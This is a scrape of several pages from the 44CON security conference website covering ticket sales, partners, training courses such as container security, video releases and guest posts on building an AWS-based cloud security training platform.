Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

#####EOF##### Partners of 44CON – 44CON

Partners of 44CON

 

Conference Partners

DeepSec

https://deepsec.net

Bringing together the world’s most renowned security professionals from academics, government, industry, and the underground hacking community.

SteelCon

https://www.steelcon.info/

SteelCon is an event held in the North of England for anyone who is interested in how things work, how things can be broken and how they can be fixed. It’s for people who like to tinker with things, aren’t happy with something until they know how it does what it does and won’t let something be broken without trying to fix it. SteelCon 2018 took place on 3rd-8th of July and 44CON ran the soldering area, we hope you saw us there!

HITB logo regular

Hack in the Box

http://conference.hitb.org/

HITBSecConf or the Hack In The Box Security Conference is an annual must attend event in the calendars of security researchers and professionals around the world. Held annually in Kuala Lumpur, Malaysia and Amsterdam in The Netherlands, HITBSecConf is a platform for the discussion and dissemination of next generation computer security
issues. Our events routinely feature two days of trainings and a two-day multi-track conference featuring cutting-edge hardcore technical talks delivered by some of the most respected names in the computer security industry. HITBSecConf is a place where ideas are exchanged, talent discovered and genius celebrated.

SS_heads

Suits & Spooks

http://www.suitsandspooks.com

Suits and Spooks London 2015 was held at the techUK facility in London. Following a fantastic event in 2014, Suits and Spooks London 2015 was our first 2-day international event. Speakers included Marina Litvinenko, the widow of the Russian FSB officer who was poisoned in London with radiation, EJ Hilbert of Kroll Associates, Zach Tumin of the NYPD, and many more. We’ll also have representatives from the British government speaking and in attendance, along with British Venture Capitalists and the usual mix of public and private sector participants.

Media Partners
ORM_logo_box_rgb

O’Reilly

http://www.oreilly.com/

O’Reilly provides technology and business training, knowledge, and insight to help companies succeed in the face of huge economic and technological shifts confronting businesses today. Our unique network of security experts and innovators share their knowledge and expertise on the company’s comprehensive training and information platform and at the O’Reilly Security conference in New York.

Community Partners
bsides

BSides London

http://www.securitybsides.org.uk

B-Sides London, Security B-Sides is a community-driven event built for and by information security community members.

BSides London 2018 took took place on 6 June 2018 at the ILEC conference centre.

BSidesAth_logo01_250x250
crest-new

CREST

CREST is the not-for-profit accreditation and certification body representing the technical information security industry. CREST provides internationally recognised accreditation for organisations and individuals providing penetration testing, cyber incident response and threat intelligence services.

All CREST Member Companies undergo regular and stringent assessment; while CREST qualified individuals have to pass rigorous examinations to demonstrate knowledge, skill and competence. CREST is governed by an elected executive board of experienced security professionals who also promote, develop and support awareness, ethics and standards within the cyber security marketplace.

Follow us on Twitter: @crestadvocate

44CON will be a community sponsor of CRESTCon 2019 that will take place on 14th March 2019 at the Royal College of Physicians in London.

IISP logo high-res centered

 IISP

The Institute of Information Security Professionals (IISP) is a not-for-profit organisation, owned by its members and dedicated to raising the standard of professionalism in information security and the industry as a whole. The IISP does this through accrediting skills and competence, by sharing best practice and by providing a network of support and guidance on individual skill development. It speaks with an authoritative voice and its competency based memberships are widely recognised in the information security industry.

Working closely with the Information Security community, the IISP has a growing membership of over 2,600 individual members across private and government sectors, forty two Corporate Member Organisations and seventeen Academic Partners.

At the heart of the Institute is the IISP Skills Framework©2012 which is widely accepted as the de facto standard for measuring competency of Information Security Professionals. CESG have taken this framework to underpin a range of certification schemes  including the Certified Professional Scheme (CCP), for which the IISP is the leading certifying body and to develop syllabuses for Masters Degrees. The skills framework is used extensively by our corporate members to benchmark and develop capability of their employees it has also been adopted by e-Skills UK to develop a National Occupational Standard for Information Security. The IISP also accredits  training courses offered by commercial training providers against the Institute’s Skills Framework. This enables attendees to build knowledge in areas of the skills framework where they might have gaps and to gain hands-on experience. 

More information about the IISP and its work can be found at www.iisp.org.

ISSA-UK

ISSA-UK

Welcome to ISSA-UK, the UK Chapter of the ISSA. With active participation from individuals and chapters all over the world, the Information Systems Security Association (ISSA) is the largest international, not-for-profit association specifically for information security professionals. Having welcomed over 1,800 members since our beginnings in 2003, the ISSA-UK Chapter is the world’s most successful chapter. At only $95 per year for membership, we offer the most value out of any security association globally.

RawHex

We break things so you don’t have to. We build things so you can do, too. Home of the HIDIOT, the little computer you can build yourself.

OWASP

The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions.

 

#####EOF##### Win CRESTCon 2019 Tickets! – 44CON

Win CRESTCon 2019 Tickets!

We’ve teamed up with CREST to give everyone the opportunity to win one of 5 (count ’em) CRESTCon 2019 tickets, worth £175 each. If you’ve never been, now’s your chance. If you’ve been before but don’t have a ticket, now’s your chance too!

CRESTCon is a one-day event organised by CREST, the international certification body for the technical information security market. This year’s CRESTCon is on March 14th at the Royal College of Physicians. If you’re on our 44CON training courses in the same week and/or are coming to 44CONnect, then this is a competition worth taking part in.

To win a CRESTCon ticket, all you need to do is make sure you’re signed up to our mailing list, and email training@44con.com from the address you’ve registered. To shamelessly stack the cards in favour of training attendees and early bird ticket holders, we’ve sliced our 5 ticket allocation the following way:

Some of the talks we’re most looking forward to at this year’s CRESTCon include:

  • Matt Lorentzen – Sheepl – Automating people for Red and Blue Team Tradecraft
  • Thomas V. Fischer – Building a Personal Data Focused Incident Response Plan to Address Breach Notification
  • Martin Jordan – Austerbury: Iranian cyber threat briefing

Winners will be chosen at random over the course of February. Get your entry in quick because like our early bird tickets, once they’re gone, they’re gone!

#####EOF##### 44CON Training – 44CON

44CON Training

As well as around the main event, 44CON run training throughout the year on a quarterly schedule. This page will be updated as more courses are finalised. You can also follow our twitter account 44CON or sign up to our mailing list for announcements as they come out.

Course attendance includes invitation to an event held during or next to the training dates. Sometimes this is a whole day. Sometimes an evening event.

2019 Schedule

June Training: 6th – 7th June 2019

We have 3 training courses available in June at two days in length. Training will take place at the Novotel London West in Hammersmith:

Course attendees will be invited to an evening event, currently scheduled for the 6th of June.

September Training: 9th – 11th September 2019

Our call for training at 44CON 2019 has now closed. 2-Day courses will run on the 10th and 11th of September. 3-day courses will run 9th-11th September. Courses will be added to the list below as info comes in. Tickets will go on sale from April 1st.

Training will take place at the Novotel London West in Hammersmith:

More courses will be listed closer to the event. All course attendees are invited to a special pre-44CON evening event on the 10th of September.

December Training: 2nd – 6th December 2019

Our call for training is now closed. Courses will be listed in due course.

Please contact us if you’d like to deliver training in London in March 2020.

44CON have been running pre-conference training courses since we started in 2011. All training updates will be announced on our twitter page @44CON or you can sign up to our mailing list.

#####EOF##### Attending – 44CON

Attending

Our next event is 44CON 2019 on 11th, 12th & 13th of September 2019. It will take place at the ILEC Conference Centre, London and will kick off on Wednesday 11th September at 6:30pm with our Community Evening. Registration will start at 6pm.

Entry is free on Wednesday evening but you will have to register beforehand (details closer to the event).

Press registration is handled separately to normal attendance registration. Please see here for more info.

Mark your calendars:

Next 44CON Conferences will take place:

  • 2019: 11th, 12th  & 13th of September 2019
  • 2020: 9th, 10th & 11th of September 2020

In the spirit of making 44CON safe and enjoyable for everyone, please ensure you adhere to our house rules at all times at and around the event.

More information will be added to this page as it becomes available so please check it regularly. You can also keep a look out on our twitter page @44CON or sign up to our mailing list where you will be the first to know about all things 44CON.

#####EOF##### 44CON 2019 Early Bird | Sense/Net

44CON is the UK’s largest combined annual Security Conference and Training event and brings the best and brightest security speakers locally and from around the world to the UK.

The event will start the evening of the 11th September 2019, with the Conference days on the 12th and 13th September 2019.

Early Bird Tickets have sold out. 

Standard tickets are now on sale.

Early Bird Tickets give you access to everything and include lunch on both Thursday and Friday.

 44CON 2019 Early Bird tickets are available in the following ticketing options:

  • Conference Ticket
  • Conference Ticket + exclusive design 44CON 2019 T-Shirt
  • Conference Ticket + hotel room at the IBIS
  • Conference Ticket + exclusive design 44CON 2019 T-Shirt + hotel room at the IBIS

You can choose between 2 nights (Wednesday and Thursday) or 3 nights (Tuesday to Thursday or Wednesday to Friday, please specify at checkout), including breakfast and WiFi, at:

  • £115 per night for a single room
  • £125 per night for a double or twin room

    You can also book rooms directly with the IBIS by emailing h5623-re8@accor.com or calling +44 (0) 207 666 8551 and quoting the following code: 44CON19-ATT at the following rates:

    • £120 per night for a single room
    • £130 per night for a double or twin room

    There is a limited number of rooms available and the code will expire one month before the event so book early to avoid disappointment.

    For more information, please visit our website 44con.com.

      Conference and training tickets are non-refundable as per our Terms of Service.

      This ticket is NOT transferable. If you want a training course as well you will need to purchase one here when they become available. This ticket will be valid only for the conference on 12th to 14th September. 

       



      TypeEvents
      Vendor44CON
      Tags 44CON, 44CON 2019, Conference, Sense/Net, ticket

      Sorry, the 44CON 2019 Early Bird is not currently available.
      #####EOF##### First Videos From 44CON 2018 Up – 44CON

      First Videos From 44CON 2018 Up

      For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts.

      First up we have Mike Gianarakis and Shubham Shah’s Catch Me If You Can. Mike and Shubs have been working on ephemeral vulnerabilities for a while, and this is a great run-down of both ephemeral bugs as a class and some of their work in the bug bounty space in general.

      Guy Barnhart-Magen and Ezra Caltum talk about hacking Machine Learning, from bias and algorithms to exploiting Remote Code Execution bugs in ML frameworks.

      Much-loved 44CON regular Saumil Shah recovers from an rm -rf incident to deliver a great talk on advanced ARM Shellcode techniques. Expect constrained shellcode with lots of polyglot tricks along the way.

      Timo and Tomi knock it out of the park with their tale of extreme lockpicking. Over a decade these advanced persistent researchers started pulling hotel locks apart. What they found is hilarious, entertaining and downright disturbing. Truly, the industry’s Penn & Teller, only the smaller one talks!

      Jack Matheson shows us the future of networking, and how SmartNICs can help secure the datacentre of the future. We look forward to talks on hacking and backdooring SmartNIC implementations, but this rare (for 44CON) optimistic talk is one to watch.

      We’ll have more videos from 2018 up soon. Don’t forget to subscribe to our YouTube channel to catch them as they come out!

      #####EOF##### 44CON – 44CON

      Building a cloud security training platform – Pt 2: Infrastructure As Code

      This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul! Continue reading “Building a cloud security training platform – Pt 2: Infrastructure As Code”

      More 2018 44CON Videos Added

      This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them. Continue reading “More 2018 44CON Videos Added”

      First Videos From 44CON 2018 Up

      For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts. Continue reading “First Videos From 44CON 2018 Up”

      Building an AWS and Azure security training platform

      This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

      Part 1 – Proof of Concept

      The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

      Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

      Continue reading “Building an AWS and Azure security training platform”

      Hacking 44CON’s Pricing Model (5 Different Ways)

      It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?” Continue reading “Hacking 44CON’s Pricing Model (5 Different Ways)”

      44CON 2019 Early-Bird Tickets are now on sale

      Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

      We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

      As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

      Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

      44CON Training Goes Quarterly

      We’ve offered training courses around 44CON for a long time. We provide a mix of high-end focused course on everything from exploiting Windows Kernel bugs to broader, more generalist courses on web application security and security monitoring. From this year onwards, we’re expanding this to a quarterly schedule.

      That’s right, you no longer have to wait a year to sit a high quality training course!

      Our 12 month schedule is available here, and you can check out our first courses scheduled for the 11th and 12th of March 2019:

      Mastering Container Security – Rory McCune, NCC Group
      Malware Reverse Engineering – Joxean Koret

      Both courses are two-days long and cost £1300 inc. VAT. When you book online remember to keep the 13th of March free for access to an exclusive, invite-only event.

      If you’d like to offer a high-end course in London, get in touch.

      #####EOF##### Archive – 44CON

      Archive

      Over the years we’ve run a lot of 44CON conferences and other events too. If you’re looking for something specific the search engine may be able to help. Here’s a list of what we’ve done over time.

      2019

      2018

      2017

      2016

      2015

      2014

      2013

      2012

      2011

      Our records, like our memories are hazy. Some talks are up on our YouTube channel.

      A list of all previous speakers can be found here. Thanks to every one of them for speaking at our events.

      #####EOF##### Mastering Container Security – 44CON

      Mastering Container Security

      Presented By: Rory McCune

      Containers and container orchestration platforms such as Kubernetes are on the rise throughout the IT world, but how do they really work and how can you attack or secure them?

      This course breaks down the fundamental components of Docker and Linux containers, showing how they work together to create isolated environments for applications.

      We’ll also be covering fundamental Linux security concepts such as namespaces, cgroups, capabilities and seccomp, along with showing how to secure (or break into) container-based applications.

      The course will then move on to the world of container orchestration and clustering, looking at how Kubernetes works and the security pitfalls that can leave the clusters and cloud-based environments which use containers exposed to attack.

      The 2 day course will take place on the 10th & 11th September 2019 in London.
      The price is £1,300 (inc VAT). Book your place in our shop now.

      Learning Objectives

      • Guidance on how to effectively use Docker to  build secure and performant container images.
      • Details on how Linux containers are constructed and secured, including cgroups, namespaces, capability and seccomp filtering.
      • Hardening guidance for Docker Engine instances.
      • Introduction to container clustering and orchestration with Docker Swarm.
      • Secure configuration and attacks of Kubernetes clusters.
      • Techniques for effectively assessing the security of container images.

      Course Outline

      Day 1:

      • Docker Basics
      • Using Docker – This starts with basic Docker commands to familiarise students with how they work.
      • Docker networking – A look at how Docker networking operates and the options available that can be used to help isolate potentially dangerous containers.
      • Creating Docker Images – Covering how to create Docker images with examples around security tool creation.
      • Container Fundamentals – This delves into Linux container primitives, such as namespaces, cgroups, capabilities and seccomp filtering, essentially showing how container security is applied.
      • Docker Security – This looks at primary security concerns around the use of Docker Engine, including common pitfalls and how to attack or mitigate them.
      • Extras – Depending on how fast the students have been working through the day’s content, some extras can be covered, such as looking at the wider Docker ecosystem and some tooling to help manage containers more easily.

      Day 2:

      • Docker Swarm – this looks at the in-built Docker container orchestration platform, Docker Swarm, how its security is implemented and common weaknesses that might be exploited by attackers to compromise it.
      • Introduction to Kubernetes – Here we’ll cover the Kubernetes container orchestration platform and look at how it’s architected and composed. The goal is to familiarise students with how the platform operates so they can understand key areas of security concern/points of attack.
      • Kubernetes Security – This module looks at three major threat models for Kubernetes clusters (external attackers, compromised containers, and malicious users) and walks through the likely attack paths that each would take, showing practical approaches to exploiting Kubernetes security weaknesses.
      • Openshift and Amazon ECS – A quick look at some of the other commonly encountered options for containerization and possible security concerns in each of these.

      Target Audience

      Security employees, from both blue teams (internal defence) and red teams (external testers) who are looking to get a better understanding of containerisation and its security concerns.

      Student Requirements

      The course assumes a reasonable level of familiarity with Linux basics, but no familiarity with containerisation.

      What to Bring

      • Working laptop where you have administrator rights

      Software Requirements

      • Linux / Windows / Mac OS X desktop operating systems
      • SSH client capable of using key based logins

      Students will be provided with

      Copies of the course including all exercises and Virtual Machine images used during the course.

      About the Trainer

      LEAD INSTRUCTOR – Rory McCune @raesene

      Rory has worked in the Information and IT Security arena for the last 18 years in a variety of roles, from financial services, to running a small testing company, to working for large companies as a consultant. These days he spends most of his work time on application, cloud and container security.

      He’s an active member of the UK InfoSec community and has been presenting at security and general IT conferences for the last 8 years, including having the accolade of, currently, being the only person to have spoken at all the UK BSides conferences. When he’s not working he can generally be found out and about enjoying the scenery in the Highlands of Scotland, if the midgies aren’t biting!

      Book your 44CON 2019 training course now!

      #####EOF##### Media – 44CON

      More 2018 44CON Videos Added

      This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them. Continue reading “More 2018 44CON Videos Added”

      First Videos From 44CON 2018 Up

      For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts. Continue reading “First Videos From 44CON 2018 Up”

      #####EOF##### Building an AWS and Azure security training platform – 44CON

      Building an AWS and Azure security training platform

      This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

      Part 1 – Proof of Concept

      The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

      Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

      When I’ve delivered similar courses in the past, students brought their own laptops and installed the software they needed for the hands-on AWS and Azure security labs, either in advance or during the course.

      For this course, Steve suggested I create a YouTube video showing how to install the various software needed, and that got me thinking – wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

      So I started looking at building a training platform which students can use – and as this is a cloud security course, what better place to do this than in the cloud?

      First step was a proof of concept – so I created some Amazon WorkSpaces instances in the cloud, manually using the AWS console, and started installing software.

      Within 30 minutes, I had created two virtual desktops in the cloud – one Windows, the other Linux, and connected to each in turn with the Amazon WorkSpaces client from my laptop. The user experience was really good – even when connecting over mobile data. Then I installed the software I needed for the course, tested it, and created workspace bundles to be used as images for future builds. I created new WorkSpaces from the bundles to make sure that they came up correctly with all the software preinstalled and configured.

      So I’ve successfully proved the concept – the next step is to develop a design for a solution which could be used for 10 – 20 students, with full automation for building and tearing down the training environment immediately after the course – to avoid unnecessary bills!

      This is the design I came up with, after doing some research on Amazon WorkSpaces and AWS Directory Services:

      AWS Directory Services has several options, the one I selected was Microsoft Active Directory Standard Edition, which can be used with both Windows and Linux Amazon WorkSpaces.

      As this is a cloud security course, it’s important that the design isn’t just functional, but also demonstrates secure cloud architectures.

      The design includes:
      • Virtual Private Cloud (VPC) with private address space
      • private user subnets, containing the AWS managed Active Directory domain controllers and the WorkSpaces, with no route to the Internet
      • public DMZ subnets for outbound access to the Internet using NAT Gateways
      • Windows Server 2016 instance for administration and setup of the Active Directory domain, users and groups
      • Security group on the admin server only allowing inbound remote desktop access from a single IP address.

      If you’re wondering how the Amazon WorkSpaces client connects via the Internet, that’s not shown on this diagram, as it’s managed by AWS via a second network interface on each WorkSpace virtual desktop.

      The next step is to set up a new AWS account for the training platform. I’ll cover that in the next Blog post.

      Paul’s Cloud Security and DevOps Workshop course runs on the 6th and 7th of June.

      Book now

      #####EOF##### Building a cloud security training platform – Pt 2: Infrastructure As Code – 44CON

      Building a cloud security training platform – Pt 2: Infrastructure As Code

      This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul!

      The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own. As I described in my last blog post I also decided to build a training platform, so that students can connect to a virtual desktop in the cloud with all the software they need pre-installed.

      That way they can come on to the course with any laptop or even tablet which supports the Amazon WorkSpaces client.

      The next step after the proof of concept and design was to build it using as much automation as possible – to keep cost low, I wanted to easily destroy everything as soon as a course finished, and to rebuild just before starting the next one.

      I’m also taking the opportunity to demonstrate good security practice, and I’ll use the training environment as an example to show students during the course.

      An important security principle is segregation, so I decided to build the training environment in its own AWS account. But I didn’t want to have yet another monthly bill. So I used AWS Organizations to create the new account:

      That way, billing for all my AWS accounts is consolidated, and I can also use Service Control Policies to enforce security policies on the new account.

      The next step was to create the AWS Directory Service – this is an AWS managed Active Directory which I’ll use to manage user identities, for students to log on to their Amazon WorkSpaces virtual machines. I decided to use Terraform by Hashicorp, as it’s ideal for automating infrastructure as code:

      Here’s an example of the code snippet used to create the AWS Directory service:

      My terraform code included nearly all the required resources:

      • VPC, DMZ and private subnets in multiple availability zones, subnet routes
      • Network Address Translation (NAT) gateways and Internet gateway
      • Key and key alias in AWS Key Management Service
      • Virtual machine instance for Active Directory admin, security group and Elastic IP
      • Amazon Route 53 domain name for AD Admin virtual machine Elastic IP
      • Identity and Access Management (IAM) policy and role for AD admin virtual machine
      • AWS System Manager templates for domain join and Windows feature setup
      • Secrets in AWS Secret Manager for user passwords – more on this later

      The one exception is Amazon Workspaces, as these are not supported by Terraform at the time of writing.

      I typed “terraform apply” and about 30 minutes later the infrastructure was built in the new AWS account, and I could see all the resources in the portal. Here’s the AWS Directory service built from the code snippet above:

      After some troubleshooting, I succeeded in automating the domain join of the AD Admin Windows Server 2016 virtual machine, using an AWS Systems Manager document template. I also created some automation templates to set up the Windows feature for Active Directory administration tools, and to install the AWS PowerShell Module, so I could use these later.

      Then, I logged in to the AD admin virtual machine using Microsoft Remote Desktop with my domain admin credentials:

      Opening Active Directory Users and Computers, I could see the AWS Directory domain.

      All I needed now was some automation scripts to create users, and then build the Amazon Workspaces. I’ll cover these in my next post.

      #####EOF##### 44CON

      Building a cloud security training platform – Pt 2: Infrastructure As Code

      This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul! Continue reading “Building a cloud security training platform – Pt 2: Infrastructure As Code”

      More 2018 44CON Videos Added

      This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them. Continue reading “More 2018 44CON Videos Added”

      First Videos From 44CON 2018 Up

      For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts. Continue reading “First Videos From 44CON 2018 Up”

      Building an AWS and Azure security training platform

      This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

      Part 1 – Proof of Concept

      The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

      Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

      Continue reading “Building an AWS and Azure security training platform”

      Hacking 44CON’s Pricing Model (5 Different Ways)

      It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?” Continue reading “Hacking 44CON’s Pricing Model (5 Different Ways)”

      44CON 2019 Early-Bird Tickets are now on sale

      Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

      We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

      As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

      Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

      44CONnect – A 1-day invite-only event in March 2019

      44CONnect is a 1-day invite-only event taking place on the 13th of March, somewhere in London. The purpose of the day is to bring together people doing 44CON training, so they can connect with trainers and people on different courses. It’s our way of giving people who’ve attended our courses the chance to get a taste of upcoming training, and the opportunity to get some extra credit to take back to the office.

      To qualify for an invite, you need to have done one of the following:

      There are 20 tickets available, so make sure you qualify!

      Our trainers from the last two days of training will deliver talks, as well as some of those delivering courses later this year. All of our training course delegates are invited, for whom lunch will be included. Early bird ticket holders invited to the event will have to buy their own lunch, as we can’t book it for them in advance.

      There’ll be a special round of lightning talks for training delegates to deliver a short talk about something they learned on their course. Those speaking will get a small certificate of thanks that they can take back to the office.

      Drinks have been organised for the evening, but we need to be in bed early for CRESTCon the next day.

      *Early-bird ticket holders will be chosen at random throughout February, although unsubstantiated rumours abound that asking for an invite on your ticket order may drastically improve your chances…

      #####EOF##### 44CONnect – A 1-day invite-only event in March 2019 – 44CON

      44CONnect – A 1-day invite-only event in March 2019

      44CONnect is a 1-day invite-only event taking place on the 13th of March, somewhere in London. The purpose of the day is to bring together people doing 44CON training, so they can connect with trainers and people on different courses. It’s our way of giving people who’ve attended our courses the chance to get a taste of upcoming training, and the opportunity to get some extra credit to take back to the office.

      To qualify for an invite, you need to have done one of the following:

      There are 20 tickets available, so make sure you qualify!

      Our trainers from the last two days of training will deliver talks, as well as some of those delivering courses later this year. All of our training course delegates are invited, for whom lunch will be included. Early bird ticket holders invited to the event will have to buy their own lunch, as we can’t book it for them in advance.

      There’ll be a special round of lightning talks for training delegates to deliver a short talk about something they learned on their course. Those speaking will get a small certificate of thanks that they can take back to the office.

      Drinks have been organised for the evening, but we need to be in bed early for CRESTCon the next day.

      *Early-bird ticket holders will be chosen at random throughout February, although unsubstantiated rumours abound that asking for an invite on your ticket order may drastically improve your chances…

      #####EOF##### Press Information – 44CON

      Press Information

      This page contains information relevant to members of the press. Whether you’re thinking of covering 44CON for your personal blog or a mainstream media outlet, we’d appreciate it if you read this anyway.

      Press Office

      There is a press office at our conferences where registered members of the press can conduct interviews and access the 44CON press team. The room has sufficient space for stands, cameras and microphones to be set up but this has to be arranged in advance.

      Guidelines

      44CON conferences are events for all sorts of information security related people who come from many walks of life and have different world views. People expect a certain right to non-intrusive behaviour. While registered press are welcome, unregistered press members will be asked to leave. In order to make everyone’s experience better, the following house rules apply:

      • Press must register as press in advance
      • Your press pass must be worn at all times
      • Except for 44CON photographers, filming and photography is not permitted in the auditorium area
      • No pictures of participants may be taken without explicit permission
      • A certain number of free press tickets are available – please contact for details
      • If you are writing an article about 44CON please let us know in advance so we can link to your organisation’s web site

      If in doubt, please ask a helper as ejection from the conference often offends. For registration, queries and notification please e-mail us.

      #####EOF##### 44CON 2018 – 44CON

      More 2018 44CON Videos Added

      This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them. Continue reading “More 2018 44CON Videos Added”

      First Videos From 44CON 2018 Up

      For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts. Continue reading “First Videos From 44CON 2018 Up”

      Advanced Wireless Attacks Against Enterprise Networks (Gabriel Ryan): Workshop Pre-Requisites

      Lab Materials for Advanced Wireless Attacks Workshop
